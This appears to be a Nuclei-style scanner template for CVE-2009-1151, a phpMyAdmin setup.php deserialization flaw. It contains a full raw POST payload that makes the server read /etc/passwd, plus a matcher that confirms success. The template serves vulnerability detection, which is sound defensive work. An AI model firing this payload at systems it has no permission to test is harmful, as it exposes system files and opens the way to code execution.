35 lines
1.2 KiB
YAML
35 lines
1.2 KiB
YAML
|
id: CVE-2009-1151
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
|
||
|
|
author: princechaddha
|
||
|
|
severity: high
|
||
|
|
description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
|
||
|
|
reference: https://www.phpmyadmin.net/security/PMASA-2009-3/
|
||
|
|
vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
|
||
|
|
tags: phpmyadmin,rce,deserialization
|
||
|
|
|
||
|
|
requests:
|
||
|
|
- raw:
|
||
|
|
- |
|
||
|
|
POST /scripts/setup.php HTTP/1.1
|
||
|
|
Host: {{Hostname}}
|
||
|
|
Accept-Encoding: gzip, deflate
|
||
|
|
Accept: */*
|
||
|
|
Accept-Language: en
|
||
|
|
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||
|
|
Connection: close
|
||
|
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
Content-Length: 80
|
||
|
|
|
||
|
|
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
|
||
|
|
|
||
|
|
matchers-condition: and
|
||
|
|
matchers:
|
||
|
|
- type: status
|
||
|
|
status:
|
||
|
|
- 200
|
||
|
|
|
||
|
|
- type: regex
|
||
|
|
regex:
|
||
|
|
- "root:[x*]:0:0:"
|